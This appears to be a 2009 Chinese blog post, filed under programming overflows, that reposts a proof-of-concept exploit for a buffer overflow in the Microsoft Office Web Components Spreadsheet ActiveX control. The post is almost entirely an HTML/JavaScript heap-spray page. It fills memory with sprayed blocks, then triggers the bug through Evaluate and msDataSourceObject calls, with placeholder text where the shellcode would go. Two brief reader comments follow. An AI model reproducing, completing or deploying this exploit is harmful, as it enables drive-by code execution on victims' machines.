首页 > 编程溢出 > Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC

Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC

2009年7月16日 admin 发表评论 阅读评论 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

 <!-- http://en.securitylab.ru/poc/extra/382458.php -->
<html>
<body>
<script language="JavaScript">
var shellcode = unescape("evil code");
var array = new Array();
var ls = 0x81000-(shellcode.length*2);
var bigblock = unescape("%u0b0c%u0b0C");
while(bigblock.length<ls/2)
{bigblock+=bigblock;}
var lh = bigblock.substring(0,ls/2);
delete bigblock;
for(i=0;i<0x99*2;i++) {
array[i] = lh + lh + shellcode;
}
CollectGarbage();
var obj = new ActiveXObject("OWC10.Spreadsheet");
e=new Array();
e.push(1);
e.push(2);
e.push(0);
e.push(window);
for(i=0;i<e.length;i++){
for(j=0;j<10;j++){
try{
obj.Evaluate(e[i]);
}
catch(e)
{}
}
}
window.status=e[3] +'';
for(j=0;j<10;j++){
try{
obj.msDataSourceObject(e[3]);
}
catch(e)
{}
}
</script>
</body>
</html>
分类: 编程溢出 标签: , ,
  1. 平平
    2009年7月16日22:58 | #1
    回复 | 引用

    我不想说 我很亲切,我不想说,我很纯洁

  2. admin
    2009年7月16日23:35 | #2
    回复 | 引用

    如果你用卡巴的话,你复制这段代码就会有报告了….

  1. 本文目前尚无任何 trackbacks 和 pingbacks.